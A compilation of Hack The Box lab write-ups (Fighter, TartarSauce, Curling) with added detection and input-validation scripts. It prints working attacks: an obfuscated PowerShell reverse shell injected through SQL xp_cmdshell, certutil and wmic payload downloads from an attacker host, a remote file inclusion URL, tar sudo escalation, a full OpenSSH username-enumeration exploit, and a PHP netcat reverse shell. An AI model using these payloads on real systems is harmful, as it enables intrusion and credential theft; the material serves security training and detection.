HTB – Fighter

Today we are going to solve another CTF challenge, “Fighter”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows only one open port: 80 (HTTP).

Since port 80 is serving HTTP, we open the IP in our browser.

On the homepage we find the domain name “streetfighterclub.htb”, and we add it to our /etc/hosts file.

We don’t find anything new on the webpage, but looking further into it we suspect there are subdomains that will give us more clues. We intercept the request and send it to Burp Intruder, marking the position in the request we want to brute-force.

We select the wordlist; we use namelist.txt, located in /usr/share/dnsrecon/.

After brute-forcing, we find a subdomain called “members.streetfighterclub.htb” that returns HTTP code 403.

We add the subdomain to /etc/hosts so that we can access the web site.

We open the webpage and get a 403 Forbidden error.

We now run a dirb scan on members.streetfighterclub.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

We then look for web pages inside that directory. Since it is an IIS server, we search for .asp files and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the web page and find that the application is vulnerable to SQL injection. We find a username, password and e-mail but are unable to log in. So we try command execution through the SQL injection (stacked queries that enable xp_cmdshell). We referred to this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We are not able to find anything useful on the target machine, so we try to upgrade our shell to Meterpreter, but we are unable to run any exe file: there is a firewall that doesn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use nps_payload to create an XML file that contains our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by nps_payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.
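The chain above (a shell spawned by SQL Server through xp_cmdshell, a 32-bit PowerShell TcpClient one-liner, certutil used as a downloader, and msbuild executing an XML project) leaves a distinctive trail in process-creation telemetry. The following script is an added example, not part of the writeup or of nps_payload: it classifies constructed sample events in a simplified "Image | ParentImage | CommandLine" layout (the paths and the process tree are modelled on this section, not real logs from the box) and tags the patterns a detection engineer would alert on. Matching is done on lower-cased values, so the mixed-case spellings in the injected payload (sySwOw64, poWersHeLl.Exe) are caught like the canonical names.

```python
import ntpath
import re

# Constructed sample events in a simplified "Image | ParentImage | CommandLine" layout
# (paths and process tree modelled on the writeup, not real telemetry from the box).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe | cmd.exe /c whoami",
    r"C:\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe | C:\Windows\System32\cmd.exe | "
    r'poWersHeLl.Exe "$clIEnT = NEw-ObJect SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80);[byte[]]$b = 0..65535|%{0}"',
    r"C:\Windows\System32\certutil.exe | C:\Windows\System32\cmd.exe | certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml",
    r"C:\Windows\System32\certutil.exe | C:\Windows\System32\cmd.exe | certutil.exe -hashfile setup.msi SHA256",
    r"C:\Windows\System32\notepad.exe | C:\Windows\explorer.exe | notepad.exe notes.txt",
]


def parse_event(line: str) -> dict:
    """Split one sample line; maxsplit=2 keeps '|' pipes inside the command line intact."""
    image, parent, cmdline = (part.strip() for part in line.split("|", 2))
    return {"image": image, "parent": parent, "cmdline": cmdline}


def classify(event: dict) -> list:
    """Return the detection tags that apply to one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmdline = event["cmdline"].lower()
    tags = []
    # xp_cmdshell: the database engine itself becomes the parent of a shell.
    if parent == "sqlservr.exe" and image in {"cmd.exe", "powershell.exe"}:
        tags.append("sql_server_spawned_shell")
    # certutil used as a downloader rather than as a certificate tool.
    if image == "certutil.exe" and "-urlcache" in cmdline and re.search(r"https?://", cmdline):
        tags.append("certutil_download")
    # msbuild handed a project/XML file outside a build: inline-task execution.
    if image == "msbuild.exe" and re.search(r"\S+\.(xml|csproj|proj)\b", cmdline):
        tags.append("msbuild_project_execution")
    if image == "powershell.exe":
        # 32-bit PowerShell on a 64-bit host (the writeup's 32-bit session).
        if "\\syswow64\\" in event["image"].lower():
            tags.append("wow64_powershell")
        # Raw socket client built on the command line: the reverse-shell pattern above.
        if "tcpclient" in cmdline:
            tags.append("powershell_tcpclient")
    return tags


def scan(lines) -> list:
    """Classify every line and return (index, tags) for the ones that fired."""
    results = []
    for index, line in enumerate(lines):
        tags = classify(parse_event(line))
        if tags:
            results.append((index, tags))
    return results


if __name__ == "__main__":
    for index, tags in scan(SAMPLE_EVENTS):
        print(index, tags)
```

The two certutil events show why the rule keys on the `-urlcache` option together with a URL rather than on the binary name alone: hashing a file with certutil is routine administration and should not page anyone.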

As soon as we run the file we get a Meterpreter session. Running sysinfo shows that we have a 32-bit Meterpreter session on a 64-bit machine.

To convert it into a 64-bit session, we list the processes, find one that is 64-bit and migrate into it.

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privileges. As this machine is themed on the Street Fighter game, we google for Street Fighter exploits and find that Street Fighter V has a privilege escalation vulnerability: it installs a service called Capcom. So we check whether that service exists on the target machine.

sc query capcom

We find this Metasploit exploit here and try to run it, but we are unable to get a shell: it errors out stating that the system is not vulnerable. So we edit the module and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check our uid with getuid, we find that we have successfully obtained administrative rights.

We enumerate the directories to find the flags, and inside “c:\users\decoder\Desktop” we find a file called “user.txt”. Taking a look at its content gives us the first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and it asks for a password. There is also a DLL file called “checkdll.dll”; the password is probably checked by this DLL.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them using IDA and find that the program XORs each character of the variable aFmFeholH with 9. Analysing further with IDA tells us that the variable contains “FmfEhO1}h”.

So we write a C program that XORs each character of “FmfEhO1}h” with 9.

We compile and run it and get the password “OdioLaFeta”.

When we provide the password to the root.exe we get our final flag.

With the help of Empire

Bypassing Defender with starfighter_xsl from Empire, by Luis Vacas.
For this we develop a small Python script that makes the target run our .xsl and gives us an Empire agent:

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
from requests import *

params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
.
.
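Both injected bodies on this page (the verify.asp request in the Fighter section above and the iron.py variant just shown) share one shape: a field the application treats as a number carries stacked T-SQL statements that switch on xp_cmdshell, spelled in mixed case to slip past naive filters. The script below is an added example, not code from the writeup or from ironhackers: it percent-decodes a form body the way the server would and reports the indicators a WAF rule or log review would key on, together with the input validation (logintype must be a plain integer) that would have stopped the injection. The two bodies are constructed and shortened; the assumption that logintype is a small numeric selector comes from the captured request.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample bodies for this example; shortened, not the page's captured traffic.
BENIGN_BODY = "username=alice&password=hunter2&logintype=1&rememberme=ON&B1=Login"
MALICIOUS_BODY = (
    "username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1"
    "%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE"
    "%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'whoami'%3b&rememberme=ON&B1=Login"
)

# Signatures for stacked-query abuse of MSSQL procedures. They are applied to the
# percent-decoded, lower-cased value, so the mixed-case spellings used in the
# requests above (Xp_cMdsHelL, xP_cmDshEll) match just like the canonical name.
SIGNATURES = {
    "xp_cmdshell": re.compile(r"xp_cmdshell"),
    "sp_configure": re.compile(r"sp_configure"),
    "reconfigure": re.compile(r"\breconfigure\b"),
    "stacked_statement": re.compile(r";\s*(exec|execute|insert|drop|create)\b"),
}

# Form fields the login handler should only ever accept as integers (assumption
# based on the captured request: logintype is a small numeric selector).
INTEGER_FIELDS = {"logintype"}


def decode_form(body: str) -> dict:
    """Split a form-urlencoded body on '&' and percent-decode keys and values.

    Splitting happens before decoding, so a %3b that decodes to ';' stays inside
    its value instead of being mistaken for a pair separator.
    """
    form = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        form[unquote_plus(key)] = unquote_plus(value)
    return form


def is_plain_integer(value: str) -> bool:
    """Server-side check that would have stopped this injection: an integer and nothing else."""
    return re.fullmatch(r"-?\d+", value) is not None


def find_indicators(body: str) -> list:
    """Return sorted 'field:indicator' strings for one request body; empty means clean."""
    findings = []
    for field, value in decode_form(body).items():
        lowered = value.lower()
        for name, pattern in SIGNATURES.items():
            if pattern.search(lowered):
                findings.append(f"{field}:{name}")
        if field in INTEGER_FIELDS and not is_plain_integer(value):
            findings.append(f"{field}:not_an_integer")
    return sorted(findings)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(f"{label}: {find_indicators(body) or 'clean'}")
```

The integer check is the durable fix; the signatures are the compensating control. A parameterised query that binds logintype as an integer never sees the trailing statements at all, whereas a signature list has to be maintained as new procedure names and encodings appear.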

Let’s migrate from Empire to Metasploit: https://github.com/trustedsec/nps_payload (example of use)

cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge, “TartarSauce”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of TartarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds

Let’s navigate to port 80 through a web browser. Browsing to the IP brings up the landing page.

We don’t find anything on the webpage, so we run dirb to enumerate directories and find one called “/webservices/”. Since that directory itself contains nothing of interest, we enumerate further below “/webservices/”.

The dirb scan gives us the directory “/webservices/wp/”, which hosts a WordPress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for an exploit and find that it is vulnerable to Remote File Inclusion (RFI):

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the PoC from exploit-db and use the php-reverse-shell.php shipped with Kali Linux. We copy it to the desktop, rename it to wp-load.php, and start our Python HTTP server so that the RFI on the target fetches and executes our PHP shell.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/
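The advisory's root cause is a user-controlled prefix that goes straight into require(): with a URL it becomes remote inclusion, with a traversal sequence it becomes local inclusion. As an added illustration (written in Python, not the plugin's PHP, and not part of the writeup), here is the validation a server-side include of a user-supplied path should perform before touching the filesystem: reject any scheme or host, resolve the result and confirm it stays under the application root. The application root and the sample prefixes are constructed; the file name wp-load.php and the http:// prefix are the ones from the advisory and the request above.

```python
import os
from urllib.parse import urlsplit


class UnsafeIncludePath(ValueError):
    """Raised when a user-supplied include prefix would leave the application root."""


def resolve_include(app_root: str, user_prefix: str, filename: str = "wp-load.php") -> str:
    """Return the only file an include built from user input may resolve to, or raise.

    Two checks, matching the two failure modes of an unchecked require($abspath . 'wp-load.php'):
    a URL prefix (remote inclusion) and a traversal or absolute prefix (local inclusion).
    """
    parts = urlsplit(user_prefix)
    if parts.scheme or parts.netloc:
        raise UnsafeIncludePath(f"URL prefix rejected: {user_prefix!r}")
    root = os.path.realpath(app_root)
    candidate = os.path.realpath(os.path.join(root, user_prefix, filename))
    # realpath has collapsed any '..' and symlinks; the result must still sit under root.
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafeIncludePath(f"path escapes application root: {candidate!r}")
    return candidate


def is_safe_prefix(app_root: str, user_prefix: str) -> bool:
    """Boolean wrapper for logging or tests."""
    try:
        resolve_include(app_root, user_prefix)
    except UnsafeIncludePath:
        return False
    return True


# Hypothetical application root (constructed from the URL path in the request above).
APP_ROOT = "/var/www/html/webservices/wp"

# Constructed prefixes with the verdict each should receive.
SAMPLE_PREFIXES = {
    "": True,                    # the legitimate case: the plugin's own root
    "wp-content/../": True,      # harmless relative detour that resolves back under root
    "http://10.10.14.20/": False,  # remote inclusion, the advisory's case
    "//10.10.14.20/": False,     # scheme-relative URL, still a foreign host
    "../../../../etc/": False,   # traversal out of the web root
    "/etc/": False,              # absolute path replaces the root entirely
}


def check_samples() -> dict:
    """Evaluate every sample prefix; the result should equal SAMPLE_PREFIXES."""
    return {prefix: is_safe_prefix(APP_ROOT, prefix) for prefix in SAMPLE_PREFIXES}


if __name__ == "__main__":
    for prefix, verdict in check_samples().items():
        print(f"{prefix!r:25} -> {'allowed' if verdict else 'rejected'}")
```

In PHP the equivalent defence is to stop concatenating at all: derive the include target from a fixed constant such as the plugin's own directory and ignore the request parameter, which is what the vendor's fix amounts to for an "abspath" that the server already knows.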

We set up our listener using netcat; as soon as we execute our PHP shell through the RFI, we get a reverse shell. We go to the “/home” directory and find a folder called “onuma”, which we are unable to access. So we spawn a TTY shell using Python and check the sudoers list: we can run tar as user “onuma” without any password. Hence we can exploit tar’s checkpoint actions (the same trick used in wildcard injection) for privilege escalation.

We’ll take advantage of the tar options for checkpoints. The --checkpoint=x flag tells tar to take some action every x bytes, as a progress update. The default behavior is to print a status message. However, the --checkpoint-action parameter allows the user to specify what action to take at a check point. So I can have it just give me a shell:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7

I use pspy for process detection. Here, letting pspy32 run for a bit shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating the system, we find a file called backuperer that is symlinked to a file named “backup” in the /usr/local/bin directory.

Looking at its content, we find that it creates a gzip archive of the files inside “/var/www/html/” and checks the integrity of that archive 30 seconds after creating it.

We use a script that takes advantage of that sleep: because backuperer waits 30 seconds before checking the archive’s integrity, we have 30 seconds to replace the archive. We use this script here. After running the script we get the root flag.

Author: Sayantan Bera

HTB – Curling

Today we are going to solve the CTF challenge “Curling”. It is a lab developed by Hack the Box, who have an amazing collection of online labs on which you can practice your penetration testing skills, designed for beginner to expert penetration testers. This is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

As these labs are only available online, they have a static IP. Curling has IP: 10.10.10.59.

Now, as always let’s begin our hacking with the port enumeration.

We see a blog titled “Cewl Curling site!”, and it’s Joomla. At this point I would run joomscan, but I wanted to do some manual enumeration first, so I checked the source of the page, and at the end of the body I found this comment:

So I checked /secret.txt and found this base64 string:

c:\PENTEST>curl http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh

Decoding:

PS C:\Users\jacco> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q3VybGluZzIwMTgh"))
Curling2018!

We can use Curling2018! as a password. But what is the username? If we take a look at the main page again and read the posts:

We notice a name in one of the posts: Floris. Now we can try to log in as floris with the password Curling2018!:

And it worked. While I was doing this enumeration I ran wfuzz in the background and got these results:

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.150/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.150/FUZZ
Total requests: 220551

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000007:  C=301      9 L       28 W          313 Ch        "images"
000005:  C=200    361 L     1051 W        14261 Ch        ""
000001:  C=200    361 L     1051 W        14261 Ch        "# directory-list-2.3-medium.txt"
000002:  C=200    361 L     1051 W        14261 Ch        "#"
000003:  C=200    361 L     1051 W        14261 Ch        "# Copyright 2007 James Fisher"
000004:  C=200    361 L     1051 W        14261 Ch        "#"
000071:  C=301      9 L       28 W          312 Ch        "media"
000072:  C=301      9 L       28 W          316 Ch        "templates"
000136:  C=301      9 L       28 W          314 Ch        "modules"
000474:  C=301      9 L       28 W          310 Ch        "bin"
000510:  C=301      9 L       28 W          314 Ch        "plugins"
000629:  C=301      9 L       28 W          315 Ch        "includes"
000861:  C=301      9 L       28 W          315 Ch        "language"
000996:  C=301      9 L       28 W          317 Ch        "components"
001074:  C=301      9 L       28 W          312 Ch        "cache"
001240:  C=301      9 L       28 W          316 Ch        "libraries"
003228:  C=301      9 L       28 W          310 Ch        "tmp"
003538:  C=301      9 L       28 W          314 Ch        "layouts"
005680:  C=301      9 L       28 W          320 Ch        "administrator"
012477:  C=404      9 L       32 W          279 Ch        "axs"
Finishing pending requests...

We also used the OpenSSH 2.3 < 7.7 Username Enumeration PoC (Exploit-DB 45210) to confirm the username:

root@kali:~/htb/curling# cat 45210.py 
#!/usr/bin/env python

# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# IN THE SOFTWARE.

from __future__ import print_function

import argparse
import logging
import paramiko
import socket
import sys


class InvalidUsername(Exception):
    pass


def add_boolean(*args, **kwargs):
    # Stand-in for Message.add_boolean: dropping the boolean malforms the
    # publickey request, which is what triggers the server's different responses.
    pass


old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
    paramiko.common.MSG_SERVICE_ACCEPT]


def service_accept(*args, **kwargs):
    # Swap in the no-op add_boolean once the service has been accepted.
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)


def userauth_failure(*args, **kwargs):
    # A USERAUTH_FAILURE to the malformed request means the user does not exist.
    raise InvalidUsername()


paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
    paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})

logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()

sock = socket.socket()
try:
    sock.connect((args.hostname, args.port))
except socket.error:
    print('[-] Failed to connect')
    sys.exit(1)

transport = paramiko.transport.Transport(sock)
try:
    transport.start_client()
except paramiko.ssh_exception.SSHException:
    print('[-] Failed to negotiate SSH transport')
    sys.exit(2)

try:
    transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
    print('[*] Invalid username')
    sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
    print('[+] Valid username')
root@kali:~/htb/itvitae# pip install paramiko==2.0.8
root@kali:~/htb/itvitae# python 45210.py --p 22 10.10.10.150 floris
/usr/local/lib/python2.7/dist-packages/paramiko/ecdsakey.py:202: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
signature, ec.ECDSA(self.ecdsa_curve.hash_object())
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:110: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
[+] Valid username

Let’s go to /administrator and log in to the administration panel:


Editing Template Files and Getting a Reverse Shell:

In the configuration section there’s an option for templates:

Going there, we notice that protostar is the default style and template:

From Templates we go to Protostar Details and Files and create a new PHP file:

 

In the PHP file we execute a system command to get a reverse shell:

<?php
    system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 443 >/tmp/f');
?>

After we save the file we will go to http://10.10.10.59/templates/protostar/puckie.php

Then we check our listener:

c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.150: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.150] 55960: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

User

We got a reverse shell as www-data. In the /home directory there’s a directory for floris:

We don’t have read access to user.txt, but we notice a file called password_backup; looking at that file:

It’s a hex dump file, so I copied it to my box to reverse it:

To reverse a hex dump we use xxd, so xxd -r pw_backup:

Not a normal output; let’s redirect the output to a file and see:

So what happened is, it turned out to be a bzip2 file, so I decompressed it and got a gzip file; I decompressed that and got another bzip2 file; after decompressing that I got a tar file, and finally a txt file with the password:
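The same chain can be reproduced offline, which is useful for writing an unwrapper that does not depend on guessing the right tool at each layer. The script below is an added example, not part of the writeup: it builds a constructed blob with exactly the layering described above (a text file in a tar, then bzip2, gzip and bzip2 again, so the outermost layer is bzip2), renders it in xxd's default hex-dump layout, reverses that dump the way xxd -r does, and then peels the layers by magic bytes until plain data remains. The password inside is a constructed sample, not the box's.

```python
import bz2
import gzip
import io
import tarfile

SAMPLE_SECRET = b"constructed-sample-password\n"  # constructed, not the box's password


def build_sample_blob(secret: bytes = SAMPLE_SECRET) -> bytes:
    """Constructed sample: a text file inside a tar, then bzip2, gzip and bzip2 again,
    so the outermost layer is bzip2 exactly as described in the text."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name="password.txt")
        info.size = len(secret)
        tar.addfile(info, io.BytesIO(secret))
    data = bz2.compress(buf.getvalue())
    data = gzip.compress(data)
    return bz2.compress(data)


def to_xxd(data: bytes, width: int = 16) -> str:
    """Render bytes in xxd's default layout: offset, 2-byte hex groups, ASCII column."""
    hex_width = width * 2 + width // 2 - 1
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:08x}: {groups:<{hex_width}}  {ascii_col}")
    return "\n".join(lines) + "\n"


def from_xxd(dump: str, width: int = 16) -> bytes:
    """Reverse a hex dump the way `xxd -r` does: read the fixed-width hex field after
    the offset and ignore the ASCII column, which may itself look like hex digits."""
    hex_width = width * 2 + width // 2 - 1
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
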